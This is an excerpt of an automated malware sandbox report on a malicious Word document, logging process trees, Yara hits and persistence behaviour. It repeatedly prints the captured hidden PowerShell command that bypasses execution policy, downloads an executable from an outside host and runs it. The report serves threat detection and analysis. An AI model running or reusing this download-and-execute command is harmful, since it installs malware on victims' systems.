                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exe | Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\System32\verclsid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD2-48AA-11D2-8432-006008C3FBFC}\InprocServer32
                    Source: C:\Users\user\AppData\Roaming\okcff.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$478644.doc
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF70A.tmp
                    Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@53/21@4/1
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\okcff.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\okcff.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE document summary: title field not present or empty
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE document summary: author field not present or empty
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE document summary: edited time not present or 0
                    Source: 41.0.okcff.exe.400000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.7.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.7.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\okcff.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                    Data Obfuscation:

                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 9.2.okcff.exe.1e30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.1e30000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR
                    Suspicious powershell command line found
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D863D pushfd ; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D7F95 pushad ; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D7FF5 pushfd ; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D87E0 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0211EBEB push esp; retn 001Ch
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02181163 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02181464 pushad ; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02189840 push FFFFFF8Bh; ret
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_021ABD19 pushfd ; iretd
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_054297B4 push 850FD83Bh; ret
                    Source: okcff[1].exe.0.drStatic PE information: 0xF603599A [Sun Oct 17 00:04:42 2100 UTC]

                    Persistence and Installation Behavior:

                    Tries to download and execute files (via powershell)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
